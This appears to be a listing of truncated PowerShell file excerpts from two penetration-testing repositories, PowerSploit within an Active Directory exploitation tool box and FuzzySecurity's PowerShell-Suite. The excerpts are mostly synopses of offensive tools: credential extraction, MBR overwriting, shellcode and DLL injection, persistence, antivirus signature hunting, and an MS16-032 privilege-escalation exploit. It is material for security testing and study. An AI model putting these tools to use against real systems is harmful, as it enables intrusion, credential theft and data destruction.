<# .SYNPOSIS Extracts and decrypts saved session information for software typically used to access Unix systems. .DESCRIPTION Queries HKEY_USERS for PuTTY, WinSCP, and Remote Desktop saved sessions. Decrypts saved passwords for WinSCP. Extracts FileZilla, SuperPuTTY's saved session information in the siteman...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Dev/PowerSploit.psd1
PowerShell
mit
2,733
master
5,278
@{ # Script module or binary module file associated with this manifest. ModuleToProcess = 'PowerSploit.psm1' # Version number of this module. ModuleVersion = '3.0.0.0' # ID used to uniquely identify this module GUID = '6753b496-d842-40a3-924a-0f09e248640c' # Author of this module Author = 'Matthew Graeber' # Copyri...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Dev/Mayhem/Mayhem.psm1
PowerShell
mit
2,733
master
13,006
function Set-MasterBootRecord { <# .SYNOPSIS Proof of concept code that overwrites the master boot record with the message of your choice. PowerSploit Function: Set-MasterBootRecord Author: Matthew Graeber (@mattifestation) and Chris Campbell (@obscuresec) License: BSD 3-Clause Required Dependencies: None Opt...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Dev/Exfiltration/Get-GPPPassword.ps1
PowerShell
mit
2,733
master
13,672
function Get-GPPPassword { <# .SYNOPSIS Retrieves the plaintext password and other information for accounts pushed through Group Policy Preferences. PowerSploit Function: Get-GPPPassword Author: Chris Campbell (@obscuresec) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESC...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Dev/Exfiltration/Get-VaultCredential.ps1
PowerShell
mit
2,733
master
20,326
function Get-VaultCredential { <# .SYNOPSIS Displays Windows vault credential objects including cleartext web credentials. PowerSploit Function: Get-VaultCredential Author: Matthew Graeber (@mattifestation) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION Get-VaultCredenti...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Dev/Persistence/Persistence.psm1
PowerShell
mit
2,733
master
39,078
function New-ElevatedPersistenceOption { <# .SYNOPSIS Configure elevated persistence options for the Add-Persistence function. PowerSploit Function: New-ElevatedPersistenceOption Author: Matthew Graeber (@mattifestation) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIP...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Dev/AntivirusBypass/Find-AVSignature.ps1
PowerShell
mit
2,733
master
6,748
function Find-AVSignature { <# .SYNOPSIS Locate tiny AV signatures. PowerSploit Function: Find-AVSignature Authors: Chris Campbell (@obscuresec) & Matt Graeber (@mattifestation) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION Locates single Byte AV signatures uti...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Dev/Privesc/Get-System.ps1
PowerShell
mit
2,733
master
26,768
function Get-System { <# .SYNOPSIS GetSystem functionality inspired by Meterpreter's getsystem. Author: Will Schroeder (@harmj0y), Matthew Graeber (@mattifestation) License: BSD 3-Clause Required Dependencies: PSReflect .DESCRIPTION Executes "getsystem" functionality similar to Meterpreter. 'NamedPipe' impers...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Dev/Privesc/Privesc.psd1
PowerShell
mit
2,733
master
1,659
@{ # Script module or binary module file associated with this manifest. ModuleToProcess = 'Privesc.psm1' # Version number of this module. ModuleVersion = '3.0.0.0' # ID used to uniquely identify this module GUID = 'efb2a78f-a069-4bfd-91c2-7c7c0c225f56' # Author of this module Author = 'Will Schroeder (@harmj0y)' #...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Dev/ScriptModification/Out-CompressedDll.ps1
PowerShell
mit
2,733
master
2,486
function Out-CompressedDll { <# .SYNOPSIS Compresses, Base-64 encodes, and outputs generated code to load a managed dll in memory. PowerSploit Function: Out-CompressedDll Author: Matthew Graeber (@mattifestation) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION Ou...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Dev/ScriptModification/ScriptModification.psd1
PowerShell
mit
2,733
master
951
@{ # Script module or binary module file associated with this manifest. ModuleToProcess = 'ScriptModification.psm1' # Version number of this module. ModuleVersion = '3.0.0.0' # ID used to uniquely identify this module GUID = 'a4d86266-b39b-437a-b5bb-d6f99aa6e610' # Author of this module Author = 'Matthew Graeber' ...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Dev/ScriptModification/Out-EncryptedScript.ps1
PowerShell
mit
2,733
master
5,159
function Out-EncryptedScript { <# .SYNOPSIS Encrypts text files/scripts. PowerSploit Function: Out-EncryptedScript Author: Matthew Graeber (@mattifestation) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncryptedScript will encrypt a script (or any text fil...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Dev/ScriptModification/Remove-Comment.ps1
PowerShell
mit
2,733
master
5,159
function Remove-Comment { <# .SYNOPSIS Strips comments and extra whitespace from a script. PowerSploit Function: Remove-Comment Author: Matthew Graeber (@mattifestation) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION Remove-Comment strips out comments and unnece...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Dev/ScriptModification/Out-EncodedCommand.ps1
PowerShell
mit
2,733
master
7,792
function Out-EncodedCommand { <# .SYNOPSIS Compresses, Base-64 encodes, and generates command-line output for a PowerShell payload script. PowerSploit Function: Out-EncodedCommand Author: Matthew Graeber (@mattifestation) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRI...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Dev/Tests/Privesc.tests.ps1
PowerShell
mit
2,733
master
55,867
Set-StrictMode -Version Latest $TestScriptRoot = Split-Path $MyInvocation.MyCommand.Path -Parent $ModuleRoot = Resolve-Path "$TestScriptRoot\.." $ModuleManifest = "$ModuleRoot\Privesc\Privesc.psd1" Remove-Module [P]rivesc Import-Module $ModuleManifest -Force -ErrorAction Stop # import PowerUp.ps1 manually so we expo...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Dev/Recon/Recon.psd1
PowerShell
mit
2,733
master
3,146
@{ # Script module or binary module file associated with this manifest. ModuleToProcess = 'Recon.psm1' # Version number of this module. ModuleVersion = '3.0.0.0' # ID used to uniquely identify this module GUID = '7e775ad6-cd3d-4a93-b788-da067274c877' # Author of this module Author = 'Matthew Graeber', 'Will Schroed...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Dev/Recon/Invoke-CompareAttributesForClass.ps1
PowerShell
mit
2,733
master
32,639
function Get-AllAttributesForClass {<# .Synopsis Gets all AD Schema attributes for class .DESCRIPTION This function will get all attributes for a class from AD. .EXAMPLE PS C:\> Get-AllAttributesForAClass -class user .EXAMPLE PS C:\> Get-AllAttributesForAClass -class computer #> [CmdletBinding()] P...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Dev/Recon/Get-HttpStatus.ps1
PowerShell
mit
2,733
master
3,592
function Get-HttpStatus { <# .SYNOPSIS Returns the HTTP Status Codes and full URL for specified paths. PowerSploit Function: Get-HttpStatus Author: Chris Campbell (@obscuresec) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION A script to check for the existence of...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Dev/Recon/Invoke-ReverseDnsLookup.ps1
PowerShell
mit
2,733
master
8,085
function Invoke-ReverseDnsLookup { <# .SYNOPSIS Perform a reverse DNS lookup scan on a range of IP addresses. PowerSploit Function: Invoke-ReverseDnsLookup Author: Matthew Graeber (@mattifestation) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION Invoke-ReverseDns...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Dev/Recon/Get-ComputerDetail.ps1
PowerShell
mit
2,733
master
17,708
function Get-ComputerDetail { <# .SYNOPSIS This script is used to get useful information from a computer. Function: Get-ComputerDetail Author: Joe Bialek, Twitter: @JosephBialek Required Dependencies: None Optional Dependencies: None .DESCRIPTION This script is used to get useful information from a computer...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Dev/Recon/Invoke-Portscan.ps1
PowerShell
mit
2,733
master
44,677
function Invoke-Portscan { <# .SYNOPSIS Simple portscan module PowerSploit Function: Invoke-Portscan Author: Rich Lundeen (http://webstersProdigy.net) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION Does a simple port scan using regular sockets, based (pretty) lo...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Dev/CodeExecution/Invoke-WmiCommand.ps1
PowerShell
mit
2,733
master
14,743
function Invoke-WmiCommand { <# .SYNOPSIS Executes a PowerShell ScriptBlock on a target computer using WMI as a pure C2 channel. Author: Matthew Graeber License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION Invoke-WmiCommand executes a PowerShell ScriptBlock on a target ...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Dev/CodeExecution/Invoke-Shellcode.ps1
PowerShell
mit
2,733
master
23,807
function Invoke-Shellcode { <# .SYNOPSIS Inject shellcode into the process ID of your choosing or within the context of the running PowerShell process. PowerSploit Function: Invoke-Shellcode Author: Matthew Graeber (@mattifestation) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Dev/CodeExecution/Invoke-ReflectivePEInjection.ps1
PowerShell
mit
2,733
master
151,863
function Invoke-ReflectivePEInjection { <# .SYNOPSIS This script has two modes. It can reflectively load a DLL/EXE in to the PowerShell process, or it can reflectively load a DLL in to a remote process. These modes have different parameters and constraints, please lead the Notes section (GENERAL NOTES) for information...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/PowerSploit-Dev/CodeExecution/Invoke-DllInjection.ps1
PowerShell
mit
2,733
master
13,053
function Invoke-DllInjection { <# .SYNOPSIS Injects a Dll into the process ID of your choosing. PowerSploit Function: Invoke-DllInjection Author: Matthew Graeber (@mattifestation) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION Invoke-DllInjection injects a Dll i...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Kerberoast/GetUserSPNs.ps1
PowerShell
mit
2,733
master
4,910
# Edits by Tim Medin # File: GetUserSPNS.ps1 # Contents: Query the domain to find SPNs that use User accounts # Comments: This is for use with Kerberoast https://github.com/nidem/kerberoast # The password hash used with Computer accounts are infeasible to # crack; however, if the User account a...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Powercat/powercat.ps1
PowerShell
mit
2,733
master
37,641
function powercat { param( [alias("Client")][string]$c="", [alias("Listen")][switch]$l=$False, [alias("Port")][Parameter(Position=-1)][string]$p="", [alias("Execute")][string]$e="", [alias("ExecutePowershell")][switch]$ep=$False, [alias("Relay")][string]$r="", [alias("UDP")][switch]$u=$Fal...
github
Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
https://github.com/Integration-IT/Active-Directory-Exploitation-Cheat-Sheet
Z - Tool Box/Privesc-master/privesc.ps1
PowerShell
mit
2,733
master
77,006
function Invoke-Privesc { <# .SYNOPSIS Author: Jakub Palaczynski IncludeInList .DESCRIPTION Find misconfigurations that may allow for privilege escalation. .PARAMETER Groups Groups of our interest when checking ACLs. .PARAMETER Mode Mode to use - full or lhf (default). .PARAMETER Extended Switch enables lookups that m...
github
FuzzySecurity/PowerShell-Suite
https://github.com/FuzzySecurity/PowerShell-Suite
Get-TokenPrivs.ps1
PowerShell
bsd-3-clause
2,715
master
6,545
function Get-TokenPrivs { <# .SYNOPSIS Open a handle to a process and use Advapi32::GetTokenInformation to list the privileges associated with the process token. Notes: * You can only get token privileges for a process you own or belonging to a lower privilege user account. In general, regular users can onl...
github
FuzzySecurity/PowerShell-Suite
https://github.com/FuzzySecurity/PowerShell-Suite
Invoke-Runas.ps1
PowerShell
bsd-3-clause
2,715
master
4,888
function Invoke-Runas { <# .SYNOPSIS Overview: Functionally equivalent to Windows "runas.exe", using Advapi32::CreateProcessWithLogonW (also used by runas under the hood). Parameters: -User Specifiy username. -Password Specify password. -Domain ...
github
FuzzySecurity/PowerShell-Suite
https://github.com/FuzzySecurity/PowerShell-Suite
Get-LimitChildItem.ps1
PowerShell
bsd-3-clause
2,715
master
1,200
function Get-LimitChildItem { <# .SYNOPSIS Depth limited wrapper for Get-ChildItem with basic filter functionality. .DESCRIPTION Author: Ruben Boonen (@FuzzySec) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .PARAMETER Path Top level path (local or UNC). .PARAMETER MaxDepth Fol...
github
FuzzySecurity/PowerShell-Suite
https://github.com/FuzzySecurity/PowerShell-Suite
Get-OSTokenInformation.ps1
PowerShell
bsd-3-clause
2,715
master
28,660
function Get-OSTokenInformation { <# .SYNOPSIS Get-OSTokenInformation uses a variety of API's to pull in all (accessible) user tokens and queries them for details. Notes: - This is not a perfect process as you may not be able to access all processes/threads and they may disappear between the time the script iden...
github
FuzzySecurity/PowerShell-Suite
https://github.com/FuzzySecurity/PowerShell-Suite
Subvert-PE.ps1
PowerShell
bsd-3-clause
2,715
master
7,235
function Subvert-PE { <# .SYNOPSIS Inject shellcode into a PE image while retaining the PE functionality. Author: Ruben Boonen (@FuzzySec) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION Parse a PE image, inject shellcode at the end of the code sec...
github
FuzzySecurity/PowerShell-Suite
https://github.com/FuzzySecurity/PowerShell-Suite
Invoke-MS16-032.ps1
PowerShell
bsd-3-clause
2,715
master
11,460
function Invoke-MS16-032 { <# .SYNOPSIS PowerShell implementation of MS16-032. The exploit targets all vulnerable operating systems that support PowerShell v2+. Credit for the discovery of the bug and the logic to exploit it go to James Forshaw (@tiraniddo). Targets: * Win7-Win10 & 2k...
github
FuzzySecurity/PowerShell-Suite
https://github.com/FuzzySecurity/PowerShell-Suite
Trace-Execution.ps1
PowerShell
bsd-3-clause
2,715
master
13,280
function Trace-Execution { <# .SYNOPSIS Uses the Capstone engine to recursively disassemble a PE (x32/x64) from it's entry point, effectively "following" execution flow. The following rules are observed: - jmp's are taken if they fall in the PE address space - call's are taken if they fall in the PE address spac...
github
FuzzySecurity/PowerShell-Suite
https://github.com/FuzzySecurity/PowerShell-Suite
Get-ProcessMiniDump.ps1
PowerShell
bsd-3-clause
2,715
master
2,810
function Get-ProcessMiniDump { <# .SYNOPSIS Create process dump using Dbghelp::MiniDumpWriteDump. .DESCRIPTION Author: Ruben Boonen (@FuzzySec) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .PARAMETER ProcID PID for the target process. .PARAMETER Path Dump outfile path. .EXAMP...
github
FuzzySecurity/PowerShell-Suite
https://github.com/FuzzySecurity/PowerShell-Suite
Get-SystemModuleInformation.ps1
PowerShell
bsd-3-clause
2,715
master
3,648
function Get-SystemModuleInformation { <# .SYNOPSIS Use NtQuerySystemInformation::SystemModuleInformation to get a list of loaded modules, their base address and size (x32/x64). .DESCRIPTION Author: Ruben Boonen (@FuzzySec) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .EXAMPLE ...
github
FuzzySecurity/PowerShell-Suite
https://github.com/FuzzySecurity/PowerShell-Suite
Get-SystemProcessInformation.ps1
PowerShell
bsd-3-clause
2,715
master
9,108
function Get-SystemProcessInformation { <# .SYNOPSIS Use NtQuerySystemInformation::SystemProcessInformation to get a detailed list of processes and process properties. On close inspection you will find that many process monitors such as Sysinternals Process Explorer or Process Hacker use this information class (in ...
github
FuzzySecurity/PowerShell-Suite
https://github.com/FuzzySecurity/PowerShell-Suite
Expose-NetAPI.ps1
PowerShell
bsd-3-clause
2,715
master
7,402
function Expose-NetAPI { <# .SYNOPSIS Expose-NetAPI uses reflection to import .NET API classes into PowerShell. This includes internal private classes, such as Microsoft.Win32.UnsafeNativeMethods. The "Search" parameter provides a way to search loaded assemblies for partial matches on API names. Specifying the "...
github
FuzzySecurity/PowerShell-Suite
https://github.com/FuzzySecurity/PowerShell-Suite
Check-VTFile.ps1
PowerShell
bsd-3-clause
2,715
master
3,149
function Check-VTFile { <# .SYNOPSIS Submit SHA256 hash of a file to Virus Total and retrieve the scan report if the hash is known. .PARAMETER Path Path to file. .DESCRIPTION Author: Ruben Boonen (@FuzzySec) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .EXAMPLE ...